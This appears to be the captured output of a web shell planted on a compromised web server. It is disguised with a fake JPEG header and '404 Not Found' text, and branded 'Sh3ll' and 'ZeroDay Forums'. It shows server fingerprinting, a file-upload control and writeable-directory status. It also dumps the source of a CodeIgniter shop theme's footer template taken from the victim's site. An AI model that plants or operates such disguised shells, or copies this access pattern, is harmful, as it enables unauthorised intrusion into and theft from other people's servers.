����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/adimi/application/modules/web/views/themes/martbd/include/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/adimi/application/modules/web/views/themes/martbd/include/admin_footer.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); ?>
<!--=========== Newsletter Area ===========-->
<section class="newsletter color3">
    <div class="container">
        <div class="row m0 newsletter_inner bg_gray">
            <div class="col-lg-6 col-xl-5">
                <div class="row m0 newsletter_left_area">
                    <h4 class="newsletter-title"><?php echo display('subscribe_for_news_and')." ".display('offers') ?></h4>
                </div>
            </div>
            <div class="col-lg-6 col-xl-7">
                <div id="sub_msg"></div>
                <?php echo form_open('#', array('class' => 'row m0 newsletter_form')); ?>  
                    <div class="input-group">
                        <input type="email" class="form-control" placeholder="<?php echo display('enter_your_email') ?>"
                               required="" id="sub_email">
                        <span class="input-group-btn">
                            <a href="#" class="btn btn-default subscribe color5 mt_0" type="button"
                                    id="smt_btn"><i class="fa
                             fa-paper-plane color11"></i></a>
                        </span>
                    </div>
                <?php echo form_close(); ?>
            </div>
        </div>
    </div>
</section>
<!--========= End Newsletter Area =========-->

<footer class="big-footer color2">
    <div class="container">
        <div class="page-scroll back-top color4" data-section="#top">
            <i class="lnr lnr-chevron-up"></i>
        </div>
        <div class="row">
            <div class="col-sm-4">
                <div class="footer-box">
                    <div class="footer-logo">
                        <a href="<?php echo base_url() ?>"><img src="<?php echo base_url().$Web_settings[0]['footer_logo'] ?>" class="img-responsive" alt="logo"></a>
                    </div>
                    <p><?php echo htmlspecialchars_decode($Web_settings[0]['footer_details']); ?></p>
                    <address>
                        <p><?php echo display('address') ?>: <?php echo html_escape($company_info[0]['address']); ?></p>
                    </address>
                    <div class="contact_info">
                        <span><?php echo display('mobile') ?>: </span><a href="tel:<?php echo html_escape($company_info[0]['mobile']); ?>"><?php echo html_escape($company_info[0]['mobile']); ?></a>
                    </div>
                    <div class="contact_info">
                        <span><?php echo display('email') ?>: </span><a
                                href="#"><?php echo html_escape($company_info[0]['email']); ?></a>
                    </div>
                    <div class="contact_info">
                        <span><?php echo display('website') ?>: </span><a
                                href="#"><?php echo html_escape($company_info[0]['website']); ?></a>
                    </div>
                </div>
            </div>
            <div class="col-sm-7 col-sm-offset-1 hidden-xs">
                <div class="row footer_inner">
                    <?php
                    $q=1;
                    if ($footer_block) {
                        foreach ($footer_block as $footer) {?>
                            <div class="col-md-4 <?php echo(($q==1)? "hidden-sm":"");?>">
                                <div class="footer-box">
                                    <?php echo htmlspecialchars_decode($footer->details); ?>
                                </div>
                            </div>
                            <?php
                            $q++;
                        }
                    }
                    ?>
                    <?php if (1 == $Web_settings[0]['app_link_status']) { ?>
                        <div class="col-md-4 col-sm-6">
                            <div class="footer-title2">
                                <h4 class="color4 download_app color_f6"><?php echo display('download_the_app') ?></h4>
                            </div>
                            <div class="app-text">
                                <p><?php echo display('get_access_to_all_exclusive_offers') ?></p>
                            </div>
                            <br>
                            <div class="apps color44">
                                <a href="<?php if($Web_settings[0]['apps_url']){ echo html_escape($Web_settings[0]['apps_url']);}else{ echo "https://play.google.com/store/apps/details?id=com.bdtask.isshues";}  ?>" target="_blank"><img
                                            src="<?php echo base_url() . 'application/modules/web/views/themes/' . $theme . '/assets/img/play-store-1.png' ?>"
                                            class="img-responsive"
                                            alt="image">
                                </a>
                            </div>
                        </div>
                    <?php } ?>
                </div>
            </div>
        </div>
    </div>
</footer>
<div class="subfooter">
    <div class="container">
        <div class="row">
            <div class="col-sm-6">
                <div class="copy-text"><?php if ($Web_settings[0]['footer_text']) {
                        echo htmlspecialchars_decode($Web_settings[0]['footer_text']);
                    } ?></div>
            </div>
            <div class="col-sm-6">
                <?php if (1 == $Web_settings[0]['pay_with_status']) {
                if ($pay_withs) { ?>
                    <ul class="list-inline pull-right">
                        <li><h6><?php echo display('pay_with') ?> :</h6></li>
                        <?php foreach ($pay_withs as $pay_with):?>
                                <li><a href="<?php echo html_escape($pay_with['link']); ?>" target="_blank"><img width="30" height="30" src="<?php echo base_url() ?>my-assets/image/pay_with/<?php echo html_escape($pay_with['image']); ?>" alt="#"></a></li>
                            <?php endforeach; ?>
                    </ul>
                <?php } } ?>
            </div>
        </div>
    </div>
</div>
<!-- /.End of Footer -->
<footer class="mobile-footer">
    <div class="container">
        <div class="row">
            <?php  if ($footer_block) { ?>
                <?php
                foreach ($footer_block as $footer) {
                    echo htmlspecialchars_decode($footer->details);
                }
                ?>
            <?php } ?>
            <span class="copyright"><?php echo display('copyright')?></span>
        </div>
    </div>
</footer>
<input type="hidden" id="customer_id_ajax" value="<?php echo $this->session->userdata('customer_id')?>">

ZeroDay Forums Mini